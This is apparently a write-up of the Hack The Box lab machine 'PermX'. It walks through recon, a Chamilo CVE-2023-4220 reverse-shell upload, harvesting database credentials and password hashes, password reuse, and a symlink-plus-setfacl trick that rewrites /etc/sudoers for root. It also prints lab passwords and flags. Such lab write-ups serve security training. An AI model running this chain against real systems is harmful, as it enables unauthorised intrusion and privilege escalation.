Table of contents

INFO

CTF URL: https://app.hackthebox.com/machines/PermX

IP: 10.10.11.23

Difficulty: Easy

Reconaisance

NMAP

nmap -p- 10.10.11.23 -v --min-rate 10000
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

nmap -p22,80 -sS -sC -sV 10.10.11.23 -v --min-rate 10000
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_  256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: eLEARNING
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

WEB

First, add permx.htb to /etc/hosts.

Things I see:

• Education Website (eLEARNING)
• simple html pages and inactive links

Dir

dirsearch -u http://permx.htb/
# result
[12:17:38] 301 -  303B  - /js  ->  http://permx.htb/js/                     
[12:18:08] 200 -    3KB - /404.html                                         
[12:18:15] 200 -    4KB - /about.html                                       
[12:19:22] 200 -    3KB - /contact.html                                     
[12:19:26] 301 -  304B  - /css  ->  http://permx.htb/css/                   
[12:19:52] 301 -  304B  - /img  ->  http://permx.htb/img/                   
[12:19:59] 200 -  448B  - /js/                                              
[12:20:03] 200 -  491B  - /lib/                                             
[12:20:04] 301 -  304B  - /lib  ->  http://permx.htb/lib/                   
[12:20:05] 200 -  649B  - /LICENSE.txt                                      

Subdomain

• https://gist.github.com/michenriksen/60a5fd10968de2bbe0f6571b6a67e7bb/raw/9f633632ba81dd32ae6219a4c53d1e887aa345c0/subdomains.lst

wfuzz -c -f sub-fighter -w subdomains.lst  -u 'http://permx.htb' -H "Host: FUZZ.permx.htb" --hw 65
# result
000003641:   200        352 L    940 W      19347 Ch    "lms"

Adding lms.permx.htb to /etc/hosts

LMS

Found Info

• Chamilo
• Administrator : Davis Miller
  • [email protected]

Dir

dirsearch -u http://lms.permx.htb/
# result                              
...
[13:00:15] 200 -    1KB - /documentation/                                   
[13:00:15] 301 -  322B  - /documentation  ->  http://lms.permx.htb/documentation/
...

• http://lms.permx.htb/documentation/ tells the version:
  • Chamilo 1.11 - Documentation
• http://lms.permx.htb/documentation/changelog.html
  • More exactly: Chamilo 1.11.24

Exploiting Chamilo

• https://github.com/Rai2en/CVE-2023-4220-Chamilo-LMS

python3 main.py -u http://lms.permx.htb/ -a scan
# result
[+] Target is likely vulnerable. Go ahead. [+]

upload a revshell

python3 main.py -u http://lms.permx.htb/ -a revshell
# fill ip and port

Result:

nc -lvnp 1234
listening on [any] 1234 ...
cconnect to [10.10.14.178] from (UNKNOWN) [10.10.11.23] 33724
bash: cannot set terminal process group (1170): Inappropriate ioctl for device
bash: no job control in this shell
www-data@permx:/var/www/chamilo/main/inc/lib/javascript/bigupload/files$ 

Firstly, shell stabilization:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# ctrl+z
stty raw -echo; fg

PrivEsc to User

Enum - Mysql

open ports

ss -tulpn
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
udp   UNCONN 0      0      127.0.0.53%lo:53        0.0.0.0:*          
udp   UNCONN 0      0            0.0.0.0:68        0.0.0.0:*          
tcp   LISTEN 0      80         127.0.0.1:3306      0.0.0.0:*          
tcp   LISTEN 0      4096   127.0.0.53%lo:53        0.0.0.0:*          
tcp   LISTEN 0      128          0.0.0.0:22        0.0.0.0:*          
tcp   LISTEN 0      511                *:80              *:*          
tcp   LISTEN 0      128             [::]:22           [::]:*  

mysql is interesting

In /var/www, using grep -ir db_password, I found credentials for the chamilo:

• chamilo/app/config/configuration.php:

...
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
...

Let’s connect

mysql -h localhost -u chamilo -p 
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 93
Server version: 10.6.18-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> 

Let’s Enumerate

show databases;
+--------------------+
| Database           |
+--------------------+
| chamilo            |
| information_schema |
+--------------------+

use chamilo;
show tables;
+-------------------------------------+
| Tables_in_chamilo                   |
+-------------------------------------+
...
| user                                |
...


select username, lastname, firstname, official_code, password, salt from user;
+----------+-----------+-----------+---------------+--------------------------------------------------------------+---------------------------------------------+
| username | lastname  | firstname | official_code | password                                                     | salt                                        |
+----------+-----------+-----------+---------------+--------------------------------------------------------------+---------------------------------------------+
| admin    | Miller    | Davis     | ADMIN         | $2y$04$1Ddsofn9mOaa9cbPzk0m6euWcainR.ZT2ts96vRCKrN7CGCmmq4ra | awb0kMoTumbFvi22ojwv.Pg92gFTMOt837kWsGVbJN4 |
| anon     | Anonymous | Joe       | anonymous     | $2y$04$wyjp2UVTeiD/jF4OdoYDquf4e7OWi6a3sohKRDe80IHAyihX0ujdS | Mr1pyTT.C/oEIPb/7ezOdrCDKM.KHb0nrXAUyIyt/MY |
+----------+-----------+-----------+---------------+--------------------------------------------------------------+---------------------------------------------+

Cracking the hash:

vim hashes # create a file and paste hashes
john hashes --wordlist=/usr/share/wordlists/rockyou.txt

It will not work, there is an easier way :).

Reuse the password

su mtz
# 03F6lY3uXAP2bkW8

whoami
mtz

better to login with ssh

user.txt

cat user.txt 
ceaefab1bca6a325155ec4a000dcad60

PrivEsc to Root

/opt/acl.sh

we can run /opt/acl.sh as a root

sudo -l
Matching Defaults entries for mtz on permx:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User mtz may run the following commands on permx:
    (ALL : ALL) NOPASSWD: /opt/acl.sh

sudo /opt/acl.sh
Usage: /opt/acl.sh user perm file

/opt/acl.sh uses setfacl binary

cat /opt/acl.sh
#!/bin/bash

if [ "$#" -ne 3 ]; then
    /usr/bin/echo "Usage: $0 user perm file"
    exit 1
fi

user="$1"
perm="$2"
target="$3"

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
    /usr/bin/echo "Access denied."
    exit 1
fi

# Check if the path is a file
if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"

Let’s link root directory to some file

ln -s / r
sudo /opt/acl.sh mtz rwx /home/mtz/r/etc/sudoers
# changed sudoers
vim /etc/sudoers
# mtz ALL=(ALL:ALL) ALL
sudo su
whoami
# root

root.txt

cat root.txt 
63b1c7e794167e335d4d638f50198ce3

Result

• https://www.hackthebox.com/achievement/machine/1349385/613